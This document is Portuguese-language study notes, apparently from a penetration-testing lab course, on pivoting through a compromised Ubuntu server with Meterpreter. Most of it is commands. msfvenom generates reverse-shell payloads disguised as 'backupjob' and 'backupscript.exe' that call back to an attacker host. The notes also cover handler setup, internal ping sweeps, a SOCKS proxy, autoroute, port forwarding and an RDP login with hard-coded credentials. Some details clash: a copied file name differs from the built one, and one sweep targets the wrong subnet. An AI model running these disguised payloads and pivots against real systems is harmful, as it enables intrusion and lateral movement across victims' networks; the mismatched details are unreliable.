Meterpreter Tunneling & Port Forwarding

Agora, vamos considerar um cenário em que temos nosso acesso ao shell Meterpreter no servidor Ubuntu (o host pivot), e queremos executar varreduras de enumeração por meio do host pivot, mas gostaríamos de aproveitar as conveniências que as sessões Meterpreter nos trazem. Nesses casos, ainda podemos criar um pivot com nossa sessão Meterpreter sem depender do encaminhamento de porta SSH. Podemos criar um shell Meterpreter para o servidor Ubuntu com o comando abaixo, que retornará um shell em nosso host de ataque na porta 8080.

• Criando Payload para o Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

• Configurando e iniciando o multi/handler

msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run

• Podemos copiar o backupjobarquivo binário para o host pivot do Ubuntu over SSHe executá-lo para obter uma sessão do Meterpreter.

scp backupscript ubuntu@<ipAddressofTarget>:~/

• Executando a carga útil no host Pivot

chmod +x backupjob 
./backupjob

• Precisamos ter certeza de que a sessão do Meterpreter foi estabelecida com sucesso ao executar a carga útil.

• Varredura de ping

run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

• Ping Sweep For Loop em hosts Linux Pivot

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

• Varredura de ping para loop usando CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

• Varredura de ping usando PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

---

Configurando o proxy SOCKS do MSF

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run

• Confirmando que o servidor proxy está em execução

> jobs

---

Criando rotas com AutoRoute

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

• Também é possível adicionar rotas com autoroute executando autoroute na sessão Meterpreter.

run autoroute -s 172.16.5.0/23

• Listando rotas ativas com AutoRoute

run autoroute -p

• Testando a funcionalidade de proxy e roteamento

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

---

Encaminhamento de porta

• Opções de Portfwd

help portfwd

• Criando um Relay TCP Local

portfwd add -l 3300 -p 3389 -r 172.16.5.19

• Conectando ao Windows Target por meio do localhost

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

• Saída Netstat

netstat -antp

---

Meterpreter Reverso Port Forwarding

• Regras de encaminhamento de porta reversa

portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

• Configurando e iniciando multi/handler

bg
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081 
set LHOST 0.0.0.0 
run

• Gerando a carga útil do Windows

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

• Por fim, se executarmos nossa carga útil no host Windows, poderemos receber um shell do Windows dinamizado por meio do servidor Ubuntu.